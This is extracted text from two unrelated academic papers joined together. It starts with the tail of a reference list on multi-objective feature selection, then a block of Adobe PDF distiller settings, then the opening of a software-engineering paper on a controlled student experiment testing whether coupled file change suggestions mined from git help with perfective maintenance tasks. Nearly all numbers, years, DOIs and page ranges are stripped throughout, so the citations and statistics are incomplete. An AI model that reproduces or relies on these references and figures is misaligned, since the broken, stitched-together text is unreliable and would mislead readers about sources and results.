( ): – doi . /s - - - . jaszkiewicz a. . on the performance of multiple-objective genetic local search on the / knapsack problem-a comparative experiment. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . jiang s, cai z, zhang j, ong y-s. . multiobjective optimization by decomposition with pareto-adaptive weight vectors. in: seventh international conference on natural computation (icnc). vol. . shanghai: ieee, – . jungjit s, freitas a. . a lexicographic multi-objective genetic algorithm for multi-label correlation based feature selection. in: proceedings of the companion publication of the annual conference on genetic and evolutionary computation. new york, ny: acm, – . kashef s, nezamabadi-pour h. . a label-specific multi-label feature selection algorithm based on the pareto dominance concept. pattern recognition : – doi . /j.patcog. . . . klimt b, yang y. . the enron corpus: a new dataset for email classification research. in: boulicaut jf, esposito f, giannotti f, pedreschi d, eds. machine learning: ecml . berlin: springer, – . asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ida- - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.matcom. . . http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tevc. . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ konak a, coit dw, smith ae. . multi-objective optimization using genetic algorithms: a tutorial. reliability engineering & system safety ( ): – doi . /j.ress. . . . lee j, kim d-w. . memetic feature selection algorithm for multi-label classification. information sciences : – doi . /j.ins. . . . lee j, seo w, kim d-w. . effective evolutionary multilabel feature selection under a budget constraint. complexity : – doi . / / . li f, miao d, pedrycz w. . granular multi-label feature selection based on mutual information. pattern recognition : – doi . /j.patcog. . . . lin y, hu q, liu j, chen j, duan j. . multi-label feature selection based on neighborhood mutual information. applied soft computing : – doi . /j.asoc. . . . madjarov g, kocev d, gjorgjevikj d, dzeroski s. . an extensive experimental comparison of methods for multi-label learning. pattern recognition ( ): – doi . /j.patcog. . . . mirjalili s, saremi s, mirjalili sm, coelho ld s. . multi-objective grey wolf optimizer: a novel algorithm for multi-criterion optimization. expert systems with applications : – doi . /j.eswa. . . . mousavirad s, ebrahimpour-komleh h. . wrapper feature selection using discrete cuckoo optimization algorithm. international journal of mechatronics, electrical and computer technology ( ): – . pereira rb, plastino a, zadrozny b, merschmann lh. . categorizing feature selection methods for multi-label classification. artificial intelligence review ( ): – doi . /s - - - . pestian jp, brew c, matykiewicz p, hovermale dj, johnson n, cohen kb, duch w. . a shared task involving multi-label classification of clinical free text. in: proceedings of the workshop on bionlp : biological, translational, and clinical language processing. stroudsburg, pa: association for computational linguistics, – . price k, storn rm, lampinen ja. . differential evolution: a practical approach to global optimization. berlin: springer science & business media. reyes o, morell c, ventura s. . evolutionary feature weighting to improve the performance of multi-label lazy algorithms. integrated computer-aided engineering ( ): – doi . /ica- . reyes o, morell c, ventura s. . scalable extensions of the relieff algorithm for weighting and selecting features on the multi-label learning context. neurocomputing : – doi . /j.neucom. . . . safavian sr, landgrebe d. . a survey of decision tree classifier methodology. ieee transactions on systems, man, and cybernetics ( ): – doi . / . . shao h, li gz, liu gp, wang yq. . symptom selection for multi-label data of inquiry diagnosis in traditional chinese medicine. science china information sciences ( ): – doi . /s - - - . spolaôr n, cherman ea, monard mc, lee hd. a. a comparison of multi-label feature selection methods using the problem transformation approach. electronic notes in theoretical computer science : – doi . /j.entcs. . . . spolaôr n, cherman ea, monard mc, lee hd. b. relieff for multi-label feature selection. in: brazilian conference on intelligent systems (bracis). fortaleza: ieee, – . asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.ress. . . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . / / http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j.asoc. . . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ica- http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.entcs. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ trivedi a, srinivasan d, sanyal k, ghosh a. . a survey of multiobjective evolutionary algorithms based on decomposition. ieee transactions on evolutionary computation ( ): – . trohidis k, tsoumakas g, kalliris g, vlahavas ip. . multi-label classification of music into emotions. ismir : – . tsoumakas g, spyromitros-xioufis e, vilcek j, vlahavas i. . mulan: a java library for multi- label learning. journal of machine learning research (july): – . ueda n, saito k. . parametric mixture models for multi-labeled text. advances in neural information processing systems : – . velasquez m, hester pt. . an analysis of multi-criteria decision making methods. international journal of operations research ( ): – . wandekokem e, varejão f, rauber t. . an overproduce-and-choose strategy to create classifier ensembles with tuned svm parameters applied to real-world fault diagnosis. in: bloch i, cesar rm, eds. progress in pattern recognition, image analysis, computer vision, and applications. berlin: springer, – . xue b, zhang m, browne wn. . particle swarm optimization for feature selection in classification: a multi-objective approach. ieee transactions on cybernetics ( ): – doi . /tsmcb. . . yin j, tao t, xu j. . a multi-label feature selection algorithm based on multi-objective optimization. in: international joint conference on neural networks (ijcnn). killarney: ieee, – . zhang m-l, pena jm, robles v. . feature selection for multi-label naive bayes classification. information sciences ( ): – doi . /j.ins. . . . zhang m-l, zhou z-h. . ml-knn: a lazy learning approach to multi-label learning. pattern recognition ( ): – doi . /j.patcog. . . . zhang m-l, zhou z-h. . a review on multi-label learning algorithms. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . zhang q, li h. . moea/d: a multiobjective evolutionary algorithm based on decomposition. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . zhang y, gong d-w, rong m. . multi-objective differential evolution algorithm for multi- label feature selection in classification. in: proceedings, part i, of the th international conference on advances in swarm and computational intelligence. vol. . new york: springer-verlag new york, inc, – . zhang y, gong d-w, sun x-y, guo y-n. . a pso-based multi-objective multi-label feature selection method in classification. scientific reports ( ): doi . /s - - - . zitzler e, thiele l. . multiobjective optimization using evolutionary algorithms—a comparative case study. in: international conference on parallel problem solving from nature. berlin: springer, – . asilian bidgoli et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tsmcb. . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /tevc. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an evolutionary decomposition-based multi-objective feature selection for multi-label classification introduction proposed method experimental design results and discussion concluding remarks references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted january accepted september published october corresponding author jasmin ramadani, jasmin.ramadani@informatik.uni- stuttgart.de academic editor ahmed hassan additional information and declarations can be found on page doi . /peerj-cs. copyright ramadani and wagner distributed under creative commons cc-by . open access are suggestions from coupled file changes useful for perfective maintenance tasks? jasmin ramadani and stefan wagner institute of software technology, university of stuttgart, stuttgart, germany abstract background. software maintenance is an important activity in the development process where maintenance team members leave and new members join over time. the identification of files which are changed together frequently has been proposed several times. yet, existing studies about coupled file changes ignore the feedback from developers as well as the impact of these changes on the performance of maintenance and rather these studies rely on the analysis findings and expert evaluation. methods. we investigate the usefulness of coupled file changes during perfective maintenance tasks when developers are inexperienced in programming or when they were new on the project. using data mining on software repositories we identify files that are changed most frequently together in the past. we extract coupled file changes from the git repository of a java software system and join them with corresponding attributes from the versioning and issue tracking system and the project documentation. we present a controlled experiment involving student participants in which we investigate if coupled file change suggestions influence the correctness of the task solutions and the required time to complete them. results. the results show that the use of coupled file change suggestions significantly increases the correctness of the solutions. however, there is only a minor effect on the time required to complete the perfective maintenance tasks. we also derived a set of the most useful attributes based on the developers’ feedback. discussion. coupled file changes and a limited number of the proposed attributes are useful for inexperienced developers working on perfective maintenance tasks where although the developers using these suggestions solved more tasks, they still need time to understand and organize this information. subjects data science, software engineering keywords data mining, software repositories, coupled changes, git introduction software maintenance represents a very important part in software product develop- ment (abran & nguyenkim, ). maintenance is often performed by maintenance programmers. over time teams change when members leave and others join (hutton & welland, ). new members cannot be productively included to solve maintenance tasks immediately, so they need some support to successfully perform their tasks. perfective maintenance tasks represent changes dealing with new or modified user requirements (stafford, ). they are related to activities which increase performance of how to cite this article ramadani and wagner ( ), are suggestions from coupled file changes useful for perfective maintenance tasks? peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:jasmin.ramadani@informatik.uni-stuttgart.de mailto:jasmin.ramadani@informatik.uni-stuttgart.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. the system or enhance its user interface (van vliet, van vliet & van vliet, ). lientz & swanson ( ) reported that more than % of the software maintenance efforts are of perfective nature. software development produces large amounts of data which is stored in software repositories. these repositories contain the artifacts developed during software evolution. after some time, this data becomes a valuable information source for solving maintenance tasks. one of the most used techniques for analyzing software repositories is data mining. the term mining software repositories (msr) describes investigations of software repositories using data mining (hassan, ). couplings have been defined as ‘‘the measure of the strength of an association established by a connection from one module to another’’ (stevens, myers & constantine, ). change couplings are also described as files having the same commit time, author and modification description (gall, jazayeri & krajewski, ). knowing which files were frequently changed together can support developers in dealing with the large amount of information about the software product, especially if the developer is new on the project, the project started a long time ago or if the developer does not have significant experience in software development. problem statement several researchers have proposed approaches of identifying coupled file changes to give recommendations to developers (bavota et al., ; kagdi, yusuf & maletic, ; ying et al., ; zimmermann et al., ; hassan & holt, ). existing studies, however, focus on the presentation of the mining results and expert investigations and they neglect the feedback of developers on the findings as well as the impact of coupled changes on maintenance tasks. research objectives the overall aim of our research is to investigate the usefulness of coupled file change suggestions in supporting developers who are inexperienced, new on the projects or supposed to work on unfamiliar parts of the project. we provide suggestions for likely changes so that we can explore how useful the suggestions are for the developers. we identify couplings of files that are changed frequently together based on the information gathered from the software project repository. we use the version control system, the issue tracking system and the project documentation archives as data sources for additional attributes. we join this additional information to the coupled changes that we discover to build the suggestions. the usefulness of coupled file changes is determined by analyzing their influence on the correctness of the solutions and the time required for solving maintenance tasks. contribution we present a controlled experiment on the usefulness of coupled change suggestions where each of the participants try to solve four different perfective maintenance tasks and report their feedback on the usefulness of the repository attributes. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. related work many studies have been dedicated to investigating software repositories to find logically coupled changes, e.g., bieman, andrews & yang ( ); fluri, gall & pinzger ( ); gall, hajek & jazayeri ( ). we identify two granularity levels, the first one investigates the couplings based on a file level (kagdi, yusuf & maletic, ; ying et al., ) and the second scenario examines coupled changes identified between parts of files like classes, methods or modules (fluri, gall & pinzger, ; kagdi, ; zimmermann et al., ; zimmermann et al., ; hassan & holt, ). in our study, we use coupled file change on a file level. the majority of the studies dealing with identifying coupled changes use some kind of data mining for this purpose (german, ; hattori et al., ; kagdi, yusuf & maletic, ; shirabad, lethbridge & matwin, ; van rysselberghe & demeyer, ; ying et al., ; zimmermann et al., ). especially the association rules technique is often used to identify frequent changes (kagdi, yusuf & maletic, ; ying et al., ; zimmermann et al., ). this data mining technique uses various algorithms to determine the frequency of these changes. most of the studies employ the apriori algorithm (kagdi, yusuf & maletic, ; zimmermann et al., ). however, other faster algorithms like the fp-growth algorithm are also in use (ying et al., ). we generate the coupled file changes using the frequent item sets analysis and the fp-growth algorithm. most of the studies use a single data source where some kind of version control system is investigated, typically cvs or subversion. there are few studies which investigate a git version control system (bird et al., ; carlsson, ). other studies combine more than one data source to be investigated, like the version control system and an issue tracking system (canfora & cerulo, ; d’ambros, lanza & robbes, ; fischer, pinzger & gall, ; wu et al., ) where the data extracted from these two sources is analyzed and the link between the changed files and issues is determined. we use three different sources for the additional attributes: the git versioning history, the jira issue tracking system and the software documentation. to the best of our knowledge, there are few studies investigating how couplings align with developers’ opinion or feedback. coupling metrics on structural and semantic levels are investigated in revelle, gethers & poshyvanyk ( ). the developers were asked if they find these metrics to be useful. they show that feature couplings on a higher level of abstraction than classes are useful. the developers’ perceptions of software couplings are investigated in bavota et al. ( ). here the authors examine how class couplings captured by different coupling measures like semantic, logical and others align with the developers’ perception of couplings. the interestingness of coupled changes is also studied in ying et al. ( ). this study defines a categorization of coupled changes interestingness according to the source code changes. in ramadani & wagner ( ), the feedback on the interestingness of coupled file changes and attributes from the software repository was investigated. in our experiment we extend the findings of this case study and investigate the usefulness of coupled file changes and the corresponding attributes. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the categorization of changes of a software product related to the maintenance task categories defined in swanson ( ) has been previously investigated (hindle, german & holt, ; purushothaman & perry, ). the authors in purushothaman & perry ( ) classified small changes based on their purpose and implementation. the changes on the software in large commits have been categorized in hindle, german & holt ( ). they define categories to identify the types of the addressed issues and the types of the changes in large commits. similarly, we classify the issues related to the changes on the system based on the defined maintenance categories. furthermore, we classify the changes on the system based on the most involved functionalities. various experiments involving maintenance tasks have been described in the literature. nguyen, boehm & danphitsanuphan ( ) deal with assessing and estimating software maintenance tasks. de lucia, pompella & stefanucci ( ) investigate the effort estimation for corrective software maintenance. ricca et al. ( ) perform an experiment on maintenance in the context of model-driven development. chan ( ) investigates the impact of programming and application-specific knowledge on maintenance effort. in our experiment, we explore how the coupled file change suggestions influence the correctness of performing maintenance tasks and the time required to solve these tasks. background software maintenance software maintenance includes program or documentation changes to make the software system perform correctly or more efficiently (shelly, cashman & rosenblatt, ). software maintenance has been defined in the ieee standard for software maintenance (ieee, ) to be a software product modification after delivery to remove faults, improve performance or adapt the environment. in the iso/iec life cycle processes standard (iso/iec, ), maintenance is described as the process where code or documentation modifications are performed due to some problem or improvement. maintenance categories swanson ( ) defined three different categories of maintenance: corrective, adaptive and perfective maintenance. the iso/iec international standard for software maintenance (iso/iec, ) updates this list with a fourth category, preventive maintenance, so we have the following maintenance categories (pigoski, ): • corrective maintenance: this type of maintenance tasks includes corrections of errors in systems. software product modifications are performed to correct the discovered problems. it corrects design, source code and implementation errors. • adaptive maintenance: this involves changes in the environment and includes adding new features or functions to the system. software product modifications are performed to ensure software product usability in a changed environment. • perfective maintenance: this involves changes in the system which influence its efficiency. it also includes software product modifications to improve maintainability or performance. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • preventive maintenance: here, the changes to the system are performed to reduce the possibility of system failures in the future. it includes software product modification to detect and remove failures before they materialize. data mining coupled file changes to discover coupled file changes using data mining, we introduce the data technique that we employ in our study. one of the most popular data mining techniques is the discovery of frequent item sets. to identify sets of items which occur together frequently in a given database is one of the most basic tasks in data mining (han, ). coupled changes describe a situation where someone changes a particular file and also changes another file afterwards. let us say that the developer changes file f and then frequently changes file f . by investigating the transactions of changed files in the version control system commits we identify a set of files that are changed together. let us have the following three transactions: t = { f ,f ,f ,f } , t = { f ,f ,f ,f } , t = { f ,f ,f ,f } . from these three transactions, we isolate the rule that files f and f are found together: f and f are coupled. this means that when the developers changed file f , they also changed file f . if these files are found together frequently, this can help other persons by suggesting that if they change f , they should also change f . let f = { f ,f ,...,fd } be the set of all items (files) f in a transaction and t ={t ,t ,...,tn} be the set of all transactions t. as transactions, we define the commits consisting of different files. each transaction contains a subset of chosen items from f called item set. an important property of an item set is the support count δ which is the number of transactions containing an item. we call the item sets frequent if they have a support threshold minsup greater than a minimum specified by the user with ≤minsup≤|f|. ( ) data mining algorithm various algorithms for mining frequent item sets and association rules have been proposed in literature (agrawal & srikant, ; györödi & györödi, ; han, pei & yin, ). we use the fp-tree-growth algorithm to find the frequent change patterns. as opposed to the apriori algorithm (agrawal & srikant, ) which uses a bottom-up generation of frequent item set combinations, the fp-tree-growth algorithm uses partition and divide-and-conquer methods (györödi & györödi, ). this algorithm is faster and more memory-efficient than the apriori algorithm used in other studies. this algorithm allows frequent item set discovery without candidate item set generation. change grouping heuristic there are different heuristics proposed for grouping file changes (kagdi, yusuf & maletic, ). we apply a heuristic considering the file changes done by a single committer to be related and do not include the changes done by other committers in the same group. we use the complete version history of the project, however based on the ‘‘developer heuristic’’ we group the commits performed by a single developer. from each group of these commits we extract files frequently changed together. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. experimental design in this section we define the research questions, hypotheses and metrics used in our analysis. study goal we use the gqm approach (basili, caldiera & rombach, ) and its medea extension (briand, morasca & basili, ) to define the study goal. the goal of our study is to analyze the usefulness of coupled file change suggestions. the objective is to compare the correctness of the solution and the time needed for a set of maintenance tasks between the group using coupled change suggestions and the group that does not use this kind of help. the purpose is to evaluate how effective coupled file change suggestions are regarding the correctness of the modified source code and the time required to perform the maintenance tasks. the viewpoint is that of software developers and the targeted environment is open source systems. research questions we investigate the usefulness of coupled file change suggestions and the corresponding repository attributes. in this study, we concentrate on perfective maintenance to have a similar set of tasks. for that purpose we define the following research questions: rq : how useful are coupled file change suggestions in solving perfective maintenance tasks? to determine the usefulness of the coupled file changes concept, we define the following sub-questions: rq . : do coupled file change suggestions influence the correctness of perfective maintenance tasks? we investigate if there is any difference in the correctness of the maintenance task solutions between the group of developers who used coupled file change suggestions and the group not using them. rq . : do coupled file change suggestions influence the time needed to solve perfective maintenance tasks? we explore if the time that the developers need to complete the maintenance tasks differs between the group using coupled change suggestions and the group not using these suggestions. we consider two scenarios: the first one includes only the time needed to solve the tasks, the second one also includes the time needed to select relevant coupled file changes. rq : how useful are the attributes from the software repository in solving perfective maintenance tasks? the second research question deals with the attributes from the versioning system, the issue tracking system and the documentation. we investigate the perceived usefulness of each attribute in the proposed set to understand which attributes are good candidates to be provided to the developers. hypotheses we formulate the following hypotheses to answer the research questions in our study. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. for rq . we define the following hypotheses: h . . : there is no significant difference in the correctness of perfective maintenance task solutions between the developers using coupled file change suggestions and those not using these suggestions. ha. . : there is a significant difference in the correctness of perfective maintenance task between the developers who used coupled file change suggestions and those not using these suggestions. for rq . we address the following hypotheses: h . . : there is no significant difference in the time required to solve perfective maintenance tasks between the developers who used coupled file change suggestions and the developers not using these suggestions. ha. . : there is a significant difference in the time required to solve perfective maintenance tasks between the developers who used coupled file change suggestions and those not using these suggestions. to answer rq we formulate the following hypotheses: h . : there is no significant difference in the perceived usefulness among the attributes from the software repository in the current set. ha. : there is a significant difference in the perceived usefulness among the attributes from the software repository in the current set. experiment variables we define the following dependent variables: the correctness of the solution after the execution of the maintenance task, the time spent to perform the maintenance task and the usefulness of the repository attributes. for the first variable, the correctness of the task solution, we assign scores to each developer’s solution of the maintenance tasks. our approach is similar to the one presented by ricca et al. ( ) where the correctness of the solution of the maintenance task is manually assessed by defining scores from totally incorrect to completely correct task solution. we define three scores: if the developers did not execute or did not solve the task at all, if the task was partially solved and if the developer performed a complete solution of the maintenance task. the solutions are tested using unit tests to ensure the correctness of the edited source code. the second variable, the time required for executing the maintenance tasks is measured by examining the screen recordings. we mark the start time and the end time for every task. we calculate the difference to compute the total time needed to solve each task. we differentiate the time needed only to solve the tasks ts and the time needed to determine the relatedness of the coupled files tr. for the third variable, the usefulness of the repository attributes, we use an ordinal scale to identify the feedback of the developers. the participants can choose between the following options for each attribute: very useful, somewhat useful, neutral, not particularly useful and not useful. we code the usefulness feedback using the scoring presented in table . experiment design we distinguish two cases for the maintenance tasks: the first one includes tasks executed on java code in the eclipse ide without any suggestions and the second one includes tasks ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table usefulness score. very useful somewhat useful neutral not particularly useful not useful table experiment design. lab tasks lab tasks – (−) tasks – (+) lab tasks – (+) tasks – (−) executed with additional coupled files suggestions and corresponding attributes from the repositories. we use a similar approach to the one presented by ricca et al. ( ) and define two values: − for eclipse only and + for the coupled file suggestions. we use a counterbalanced experiment design as described in table . this ensures that all subjects work with both treatments: without and with coupled change suggestions. we split the subjects randomly into two groups working in two lab sessions of two hours each. in each session, the participants work on two tasks using only the task description and on two tasks using coupled file change suggestions and their related attributes. the participants in the second lab swapped the order of the tasks in the first lab. objects the object of the study is an open source java software called a-stpa. the source code and the repository were downloaded from sourceforge (https://sourceforge.net/projects/ astpa/). the system was built mainly in java by developers at the university of stuttgart during a software project between and . it represents an eclipse-based tool for hazard analysis. the source code contains , lines of code and classes organized in packages. the git repository of the project contains , commits from which we extracted coupled file changes. subjects the experiment participants are students from the software engineering course in their second semester at the university of stuttgart (germany). the students have basic java programming and eclipse knowledge and have not been related in any way with the software system investigated in the experiment. materials, procedure and environment all subjects received the following materials which can be found in the supplemental material of this paper. • tools and code: the participants received the eclipse ide to work with, the screen capturing tool and the source code they need to edit. • questionnaires: the first questionnaire is filled in at the start of the experiment and it is related to their programming background. the second questionnaire performed at the end of the experiment is about their feedback on the usefulness of coupled changes and the additional set of repository attributes. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://sourceforge.net/projects/astpa/ https://sourceforge.net/projects/astpa/ http://dx.doi.org/ . /peerj-cs. • software documentation: we provided the technical documentation for the software system including the architecture description covering the sub-projects, the overview of the classes in the data model, the application controllers, the graphic editor and the package descriptions. • setup instructions: the participants received the instruction steps how to prepare the environment, where to find the ide, the source code and how to perform the experiment. • maintenance tasks and description: every participant received spreadsheets with four maintenance tasks and their free-text description. the maintenance tasks represent quick program fixes that should be performed by the participants according to the maintenance requests (basili, ). the maintenance tasks used in the experiment require the participants to add various enhancements to the system. the changes do not influence the structure or the functionalities of the application. the tasks are related to simple changes of the user interface of the system. all four maintenance tasks are perfective and have been assigned to the participants in both groups. • set of coupled files: the files changed together frequently used to solve a similar tasks have been provided to the group that uses coupled file changes. • repository attributes: the attribute set from the versioning system, the issue tracking system and the documentation about similar tasks performed in the system. they have been joined to the coupled files using a mapping between the commits containing the coupled files and the issues using their issue ids. the environment for the experiment tasks was eclipse ide on a windows pc in both treatments. for each lab, we prepared an eclipse project containing the java source code of the a-stpa system. the project materials were made available to the subjects on a flash drive. the participants had a maximum of two hours to fill the questionnaires and perform the maintenance tasks. selection of change author according to the used heuristic for grouping the change sets in the versioning history, we need to select the authors of the changes whose data will be included in the analysis. the selection process of the developers as authors of the source code changes is presented in fig. . out of developers who worked on the a-stpa software, after performing the frequent itemset analysis, we have eight developers left whose entries in the repository delivered coupled files. we have four maintenance tasks to be solved in the experiment. for each of the tasks we use commits from a different developer to avoid the influence of the authorship of the commits on the tasks. out of the eight developers we need to select four, one for each maintenance task. selection of coupled files after selecting the developers, we continue with the selection of the coupled files. the process includes the selection of the most frequent coupled files followed by the selection of relevant coupled files as presented in fig. . ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure changes selection. full-size doi: . /peerjcs. /fig- selection of the most frequent coupled files we need to select the coupled files which we will include in the suggestions for the developers in the experiment. for each of the four developers we list the most frequent coupled files we have extracted. we sort the sets of coupled file changes by their frequency in descending order, so on top of the list we have the most frequent set of coupled files. we start selecting the sets of coupled files from the top of the list. we do this for two main reasons: ( ) to avoid a potential subjectivity in the selection of the coupled files. ( ) we want to use the strongest couplings, meaning the coupled files which are frequent and did not happen by chance. selection of relevant coupled files after identifying the most frequent coupled files, we examine their broader change context. this means that we need to determine if they fulfill the requirements to be: ( ) of perfective nature and ( ) related to modifications in the user interface of the application. we determine this change context using a manual analysis of the content of the commit messages where the coupled file changes were included as well as the description of the related issues. to perform this, we use the mappings between the commit messages and the issue ids provided as part of the corresponding repository attributes we added to the coupled file changes. classification of issues we classified the issues for the examined software systems using the approach proposed in hindle, german & holt ( ). we determine the following classes of issues: • corrective: these issues cover failures related to the processing or performance of the software. • adaptive: these changes include modifications related to the data and the processing environment. • perfective: the changes include modifications related to performance, maintenance or usability improvements. • implementation: these tasks include new requirements for the software system. ramadani and wagner ( ), peerj comput. sci., doi . 